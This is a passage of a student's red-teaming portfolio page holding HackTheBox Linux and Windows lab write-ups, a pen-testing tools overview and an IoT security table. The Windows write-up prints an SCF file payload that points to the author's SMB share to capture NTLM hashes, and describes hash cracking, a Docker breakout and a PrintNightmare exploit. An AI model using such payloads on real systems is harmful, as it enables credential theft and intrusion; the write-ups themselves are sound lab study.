                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
